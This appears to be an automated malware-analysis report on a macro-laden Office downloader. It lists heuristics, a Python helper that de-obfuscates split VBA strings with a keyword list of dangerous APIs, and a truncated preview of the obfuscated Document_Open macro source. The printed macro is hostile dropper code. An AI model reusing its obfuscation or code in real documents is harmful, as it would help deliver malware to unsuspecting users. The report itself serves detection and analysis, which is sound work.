Verdict: MALICIOUS
Risk Score: 262

Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document carrying VBA macros. A 'Document_open' auto-execution macro is present, and the code calls 'CreateObject' with a ProgID that never appears as a single literal: short string fragments are concatenated at run time to reassemble 'winmgmts', the WMI moniker commonly used by macro droppers to spawn a process through WMI instead of a direct 'Shell' call. Together with the ClamAV signature 'Doc.Downloader.Generic-7449733-0', this points to a downloader that fetches and executes a second-stage payload. The VBA source is heavily obfuscated: every procedure is padded with repeated 'Select Case' blocks whose selectors and case labels are bare identifiers that are never assigned anywhere in the visible source, so the blocks carry no data and only add noise, and the strings that matter are built from UserForm control properties (the TextBox 'Ndnmkruqzbb' on the document module 'Czifdgkef' and 'Ooyeqwvsbbtx.Dmzjhztg.ControlTipText') rather than from the macro text itself. The exact payload location and command therefore cannot be recovered from the macro source alone; they would have to be read from the form's stored properties (olevba's form-string extraction is the usual route).
Heuristics (7)

- ClamAV: Doc.Downloader.Generic-7449733-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-7449733-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code.
- Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION): VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) that appears in no single literal. Splitting an API name across string concatenation serves no purpose other than evading keyword scanning.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open auto-execution macro present.
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call present.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): The compiled VBA (p-code) / cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where readable source is unavailable. Here the decoded source was extracted as well, so the p-code finding corroborates it; when the two disagree, suspect VBA stomping and disassemble the p-code (for example with pcodedmp) to see what Office would actually run.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace URI present in ordinary Office files, not a download or command-and-control indicator.
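The split-literal heuristic above, and the summary's point that the ProgID only exists once the pieces are joined, can be reproduced on extracted macro source with a little static folding. The Python below is an added example written for this page; it is not part of the report, of the analyzer, or of oletools. The VBA text it runs on is constructed to mirror the layout of the macro preview (filler Select Case blocks over never-assigned names, string pieces carried across several assignments, terms read from UserForm control properties); the literal values, the keyword list and every name are assumptions, not values recovered from the real sample.

```python
import re

# Added triage helper for split-keyword VBA obfuscation. Not part of the
# report, the analyzer or oletools. Keyword list and all names are assumptions.
KEYWORDS = ("winmgmts", "wscript.shell", "scripting.filesystemobject",
            "shell.application", "powershell", "urldownloadtofile")

# Constructed VBA that mirrors the layout of the macro preview; it is NOT the
# extracted macro and the literal values are invented.
SAMPLE_VBA = '''\
Private Sub Document_open()
Select Case Mtxpbxxkup
Case Wwhqxgwfnywx
ISxdk951 = AWN
FKNpk15B = 23
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Xkdtlkfcbal)))
End Select
Dcaskaka = "winm" + "gm"
Aoegnkuv = Dcaskaka & "ts:"
Mebtkohizear = "W" + "Scr" + "ipt." + "Sh" + "ell"
Target = "http://" + Czifdgkef.Ndnmkruqzbb + Ooyeqwvsbbtx.Dmzjhztg.ControlTipText
Set o = CreateObject(Mebtkohizear)
End Sub
'''

ASSIGN_RE = re.compile(r'^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
SELECT_RE = re.compile(r'^\s*Select\s+Case\s+([A-Za-z_]\w*)\s*$')
# string literal | (dotted) identifier | concat operator | anything else
TOKEN_RE = re.compile(r'"([^"]*)"|([A-Za-z_]\w*(?:\.[A-Za-z_]\w*)*)|([+&])|(\S)')


def assigned_names(src):
    """Every name that appears on the left-hand side of an assignment."""
    names = set()
    for line in src.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            names.add(m.group(1))
    return names


def strip_filler(src):
    """Drop Select Case blocks whose selector is never assigned in the module.
    An undeclared, never-assigned VBA variant is Empty, so the selector carries
    no data and the block is padding (heuristic; nested blocks not handled)."""
    names = assigned_names(src)
    kept, skipping = [], False
    for line in src.splitlines():
        m = SELECT_RE.match(line)
        if m and m.group(1) not in names:
            skipping = True
        if not skipping:
            kept.append(line)
        elif line.strip().lower() == "end select":
            skipping = False
    return "\n".join(kept)


def fold_strings(src):
    """Constant-fold assignments whose right-hand side is string literals and
    already-folded names joined by + or &. Returns {name: (value, parts, complete)}.
    Terms that cannot be resolved statically (form-control properties, calls)
    stay as <placeholders> and mark the value incomplete."""
    env = {}
    for line in src.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        name, rhs = m.groups()
        parts, complete, has_string = [], True, False
        for tok in TOKEN_RE.finditer(rhs):
            lit, ident, _op, other = tok.groups()
            if other is not None:          # parentheses, digits, arithmetic: not a concat
                parts = None
                break
            if lit is not None:
                parts.append(lit)
                has_string = True
            elif ident is not None:
                if ident in env:
                    parts.extend(env[ident][1])
                    complete = complete and env[ident][2]
                    has_string = True
                else:
                    parts.append("<" + ident + ">")
                    complete = False
        if parts and has_string:
            env[name] = ("".join(parts), parts, complete)
    return env


def find_reassembled(env, keywords=KEYWORDS):
    """Report folded values containing a keyword that no single literal contains."""
    hits = []
    for name, (value, parts, complete) in env.items():
        literals = [p.lower() for p in parts if not p.startswith("<")]
        for kw in keywords:
            if kw in value.lower() and not any(kw in p for p in literals):
                hits.append((name, kw, value, complete))
    return hits


def unresolved_terms(env):
    """Names whose value depends on data outside the VBA source, e.g. a UserForm
    control's text, which must be pulled from the form storage separately."""
    return {name: [p[1:-1] for p in parts if p.startswith("<")]
            for name, (_v, parts, complete) in env.items() if not complete}


def triage(src):
    cleaned = strip_filler(src)
    env = fold_strings(cleaned)
    return {"cleaned": cleaned, "hits": find_reassembled(env),
            "unresolved": unresolved_terms(env)}


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    for name, kw, value, complete in result["hits"]:
        print(f"{name}: reassembles {kw!r} -> {value!r}" + ("" if complete else " (partial)"))
    for name, refs in result["unresolved"].items():
        print(f"{name}: depends on {', '.join(refs)}")
```

strip_filler treats a Select Case on a never-assigned selector as padding, which is a heuristic rather than a proof that the block is dead. fold_strings only follows + and & between literals and names it has already folded, so anything read from a form control stays as an unresolved placeholder; that is exactly the situation in this sample, where the final string depends on Czifdgkef.Ndnmkruqzbb and Ooyeqwvsbbtx.Dmzjhztg.ControlTipText, which live in the form storage rather than in the VBA source.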
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8844 bytes | 86cf2cdbc4444da9a610e2fd388814581912dff627abc89422cd2c19c4ece2d9 |
Preview script: first 1,000 lines of the extracted script (listing truncated below)

```vba
Attribute VB_Name = "Czifdgkef"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Ndnmkruqzbb, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Select Case Mtxpbxxkup
Case Wwhqxgwfnywx
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Xkdtlkfcbal)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Cfrknshsumold
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Xnxakmzmh)
End Select
Select Case Oqxwgesrlbf
Case Aqpdrarvowk
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Tmrnhbnupcv)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Csmoxxoptp
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Folsaumdq)
End Select
Select Case Kgswnfdwptmn
Case Ggfrzmczclwh
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Kamsafoislg)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Udykrasfzff
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Sldhzfrpl)
End Select
Schszmscvkoqo
End Sub
Attribute VB_Name = "Ooyeqwvsbbtx"
Attribute VB_Base = "0{0F296782-B55F-4FBF-9E82-7CD051B2AD19}{EF8D03C2-A674-41FF-B7DD-50CD79DEFCA6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Fjrcykmrq"
Function Fpejzqoqwwcg()
Select Case Lmjcmfercy
Case Vpflekohel
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Lkkvvnlgzk)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Koqnyqguiqkzf
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Zmteakarc)
End Select
Dcaskaka = Czifdgkef.Ndnmkruqzbb
Select Case Rfiwpsllzkjx
Case Efcwnfwvzd
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Jbviewatpwjho)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Ftvzwlcwz
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Zmxwgfhr)
End Select
Aoegnkuv = Dcaskaka + Ooyeqwvsbbtx.Inoahnejc + Ooyeqwvsbbtx.Uoqqmorshteiw + Ooyeqwvsbbtx.Kberhegak
Select Case Firapzodlqjs
Case Lwrihwnvh
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Funkwscobp)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Ibadnjvzigsdu
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Rtfkbunjf)
End Select
Mebtkohizear = Aoegnkuv + Ooyeqwvsbbtx.Xoynuikmsbj + Ooyeqwvsbbtx.Dmzjhztg.ControlTipText
Select Case Oauqfdhl
Case Lqblutoorbdj
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Yiaqjxduj)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Wpghsndhufqpe
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Ylesaecmr)
End Select
Fpejzqoqwwcg = Ltadlxhhcxll + Mebtkohizear + Ltadlxhhcxll
Select Case Gsbhnjmo
... (truncated)
```